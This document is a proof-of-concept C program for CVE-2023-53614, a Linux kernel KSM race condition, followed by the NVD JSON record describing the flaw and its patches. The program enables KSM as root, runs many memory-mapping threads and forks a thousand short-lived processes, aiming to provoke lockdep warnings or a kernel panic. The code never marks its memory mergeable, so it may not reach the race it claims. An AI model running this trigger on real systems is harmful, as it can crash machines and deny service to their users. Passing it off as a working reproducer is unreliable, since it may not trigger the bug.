CVE-2023-53614

// PoC for CVE-2023-53614 - Linux Kernel KSM Race Condition // This PoC demonstrates the race condition between VMA iteration and mm_struct teardown // Note: Requires root or CAP_SYS_ADMIN to enable KSM #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <sys/wait.h> #include <fcntl.h> #include <pthread.h> #include <signal.h> #define NUM_THREADS 100 #define NUM_ITERATIONS 1000 // Function to enable KSM (requires root) int enable_ksm() { int fd = open("/sys/kernel/mm/ksm/run", O_WRONLY); if (fd < 0) { perror("Failed to open KSM control (need root)"); return -1; } if (write(fd, "1", 1) != 1) { perror("Failed to enable KSM"); close(fd); return -1; } close(fd); return 0; } // Worker thread that allocates memory and triggers KSM scanning void* ksm_worker(void* arg) { // Allocate pages that KSM will try to merge size_t size = 4096 * 100; // 100 pages void* mem = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (mem == MAP_FAILED) { return NULL; } // Fill with identical content to encourage KSM merging memset(mem, 'A', size); // Keep the mapping alive briefly to allow KSM scanning usleep(10000); munmap(mem, size); return NULL; } // Rapid process creation/exit to trigger exit_mmap race void trigger_exit_race() { for (int i = 0; i < NUM_ITERATIONS; i++) { pid_t pid = fork(); if (pid == 0) { // Child: allocate memory and exit quickly void* mem = mmap(NULL, 4096 * 50, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (mem != MAP_FAILED) { memset(mem, 0x42, 4096 * 50); // Exit immediately to trigger exit_mmap race _exit(0); } _exit(0); } else if (pid > 0) { int status; waitpid(pid, &status, 0); } } } int main() { printf("CVE-2023-53614 PoC - KSM Race Condition\n"); if (enable_ksm() != 0) { printf("Run as root to enable KSM\n"); return 1; } printf("KSM enabled. Starting race condition trigger...\n"); // Create threads to trigger KSM scanning on memory regions pthread_t threads[NUM_THREADS]; for (int i = 0; i < NUM_THREADS; i++) { pthread_create(&threads[i], NULL, ksm_worker, NULL); } // Concurrently trigger rapid process exits to race with VMA iteration trigger_exit_race(); // Join threads for (int i = 0; i < NUM_THREADS; i++) { pthread_join(threads[i], NULL); } printf("Race condition trigger completed.\n"); printf("Check dmesg for lockdep warnings or kernel panic.\n"); return 0; }

{"cve": {"id": "CVE-2023-53614", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:58.227", "lastModified": "2026-03-17T13:49:59.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/ksm: fix race with VMA iteration and mm_struct teardown\n\nexit_mmap() will tear down the VMAs and maple tree with the mmap_lock held\nin write mode. Ensure that the maple tree is still valid by checking\nksm_test_exit() after taking the mmap_lock in read mode, but before the\nfor_each_vma() iterator dereferences a destroyed maple tree.\n\nSince the maple tree is destroyed, the flags telling lockdep to check an\nexternal lock has been cleared. Skip the for_each_vma() iterator to avoid\ndereferencing a maple tree without the external lock flag, which would\ncreate a lockdep warning."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.22", "matchCriteriaId": "EB2B1008-D6E4-43AA-879E-5F46FF15124E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.9", "matchCriteriaId": "914F22DD-1E6F-4B0A-A14D-3A9F068F6761"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:*", "matchCriteriaId": "3583026A-27EC-4A4C-850A-83F2AF970673"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/286b0cab31bac29960e5684f6fb331d42f03b363", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6db504ce55bdbc575723938fc480713c9183f6a2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b4f664ffd8f78c05a1fd542a28bc5a11e994c014", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}